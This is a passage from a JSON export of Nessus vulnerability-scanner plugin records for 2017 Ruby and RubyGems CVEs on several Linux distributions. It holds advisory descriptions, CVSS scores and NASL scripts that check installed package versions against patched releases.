value:\"cpe:/o:debian:debian_linux:7.0\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libruby1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libruby1.9.1-dbg\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtcltk-ruby1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ri1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1-dev\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1-examples\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1-full\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.3\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:11:04", "description": "New ruby packages are available for Slackware 14.2 and -current to\nfix security issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-19T00:00:00", "title": "Slackware 14.2 / current : ruby (SSA:2017-261-03)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2017-09-19T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:ruby"], "id": "SLACKWARE_SSA_2017-261-03.NASL", "href": "https://www.tenable.com/plugins/nessus/103308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-261-03. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103308);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"SSA\", value:\"2017-261-03\");\n\n script_name(english:\"Slackware 14.2 / current : ruby (SSA:2017-261-03)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ruby packages are available for Slackware 14.2 and -current to\nfix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.371069\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c56759f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.2\", pkgname:\"ruby\", pkgver:\"2.2.8\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"2.2.8\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ruby\", pkgver:\"2.4.2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"2.4.2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2020-09-18T10:52:49", "description": "It was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to cause a buffer overrun. (CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to execute terminal escape sequences.\n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to execute arbitrary code. (CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to cause a denial of service. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to expose sensitive information.\n(CVE-2017-14064).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-06T00:00:00", "title": "Ubuntu 14.04 LTS : ruby1.9.1 vulnerabilities (USN-3439-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901", "CVE-2017-10748"], "modified": "2017-10-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:ruby1.9.3", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3439-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3439-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103692);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10748\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"USN\", value:\"3439-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : ruby1.9.1 vulnerabilities (USN-3439-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Ruby incorrectly handled certain inputs. 
An\nattacker could use this to cause a buffer overrun. (CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to execute terminal escape sequences.\n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to execute arbitrary code. (CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to cause a denial of service. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to expose sensitive information.\n(CVE-2017-14064).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3439-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libruby1.9.1, ruby1.9.1 and / or ruby1.9.3\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby1.9.3\", pkgver:\"1.9.3.484-2ubuntu1.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby1.9.1 / ruby1.9.1 / ruby1.9.3\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:21:41", "description": "Arbitrary heap exposure during a JSON.generate call\n\nRuby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can\nexpose arbitrary memory during a JSON.generate call. 
The issues lies\nin using strdup in ext/json/ext/generator/generator.c, which will stop\nafter encountering a '\\\\0' byte, returning a pointer to a string of\nlength zero, which is not the length stored in space_len.\n(CVE-2017-14064)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to\ninject terminal emulator escape sequences into its log and possibly\nexecute arbitrary commands via a crafted user name. (CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause\na denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications to cause a denial of service attack against\nRubyGems clients who have issued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems version 2.6.12 and earlier fails to validate specification\nnames, allowing a maliciously crafted gem to potentially overwrite any\nfile on the filesystem. (CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking\nvulnerability that allows a MITM attacker to force the RubyGems client\nto download and install gems from a server that the attacker controls.\n(CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious\nformat string which contains a precious specifier (*) with a huge\nminus value. 
Such situation can lead to a buffer overrun, resulting in\na heap memory corruption or an information disclosure from the heap.\n(CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications that include terminal escape characters.\nPrinting the gem specification would execute terminal escape\nsequences. (CVE-2017-0899)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-27T00:00:00", "title": "Amazon Linux AMI : ruby24 (ALAS-2017-915)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:rubygem24-xmlrpc", "p-cpe:/a:amazon:linux:ruby24", "p-cpe:/a:amazon:linux:ruby24-doc", "p-cpe:/a:amazon:linux:ruby24-irb", "p-cpe:/a:amazon:linux:rubygem24-did_you_mean", "p-cpe:/a:amazon:linux:ruby24-debuginfo", "p-cpe:/a:amazon:linux:rubygem24-io-console", "p-cpe:/a:amazon:linux:ruby24-devel", "p-cpe:/a:amazon:linux:rubygems24", "p-cpe:/a:amazon:linux:rubygems24-devel", "p-cpe:/a:amazon:linux:rubygem24-psych", "p-cpe:/a:amazon:linux:rubygem24-bigdecimal", "p-cpe:/a:amazon:linux:rubygem24-json", "p-cpe:/a:amazon:linux:ruby24-libs", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-915.NASL", "href": "https://www.tenable.com/plugins/nessus/104181", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory 
ALAS-2017-915.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104181);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"ALAS\", value:\"2017-915\");\n\n script_name(english:\"Amazon Linux AMI : ruby24 (ALAS-2017-915)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Arbitrary heap exposure during a JSON.generate call\n\nRuby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can\nexpose arbitrary memory during a JSON.generate call. The issues lies\nin using strdup in ext/json/ext/generator/generator.c, which will stop\nafter encountering a '\\\\0' byte, returning a pointer to a string of\nlength zero, which is not the length stored in space_len.\n(CVE-2017-14064)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to\ninject terminal emulator escape sequences into its log and possibly\nexecute arbitrary commands via a crafted user name. 
(CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause\na denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications to cause a denial of service attack against\nRubyGems clients who have issued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems version 2.6.12 and earlier fails to validate specification\nnames, allowing a maliciously crafted gem to potentially overwrite any\nfile on the filesystem. (CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking\nvulnerability that allows a MITM attacker to force the RubyGems client\nto download and install gems from a server that the attacker controls.\n(CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious\nformat string which contains a precious specifier (*) with a huge\nminus value. Such situation can lead to a buffer overrun, resulting in\na heap memory corruption or an information disclosure from the heap.\n(CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications that include terminal escape characters.\nPrinting the gem specification would execute terminal escape\nsequences. (CVE-2017-0899)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. 
(CVE-2017-0903)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-915.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-did_you_mean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems24\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:rubygems24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-debuginfo-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-devel-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-doc-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-irb-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-libs-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"rubygem24-bigdecimal-1.3.0-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-did_you_mean-1.1.0-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-io-console-0.4.6-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-json-2.0.4-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-psych-2.2.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-xmlrpc-0.2.1-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems24-2.6.13-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems24-devel-2.6.13-1.30.4.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby24 / ruby24-debuginfo / ruby24-devel / ruby24-doc / ruby24-irb / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:55:45", "description": "Ruby blog :\n\nCVE-2017-0898: Buffer underrun vulnerability in Kernel.sprintf\n\nIf a malicious format string which contains a precious specifier (*)\nis passed and a huge minus value is also passed to the specifier,\nbuffer underrun may be caused. In such situation, the result may\ncontains heap, or the Ruby interpreter may crash.\n\nCVE-2017-10784: Escape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nWhen using the Basic authentication of WEBrick, clients can pass an\narbitrary string as the user name. 
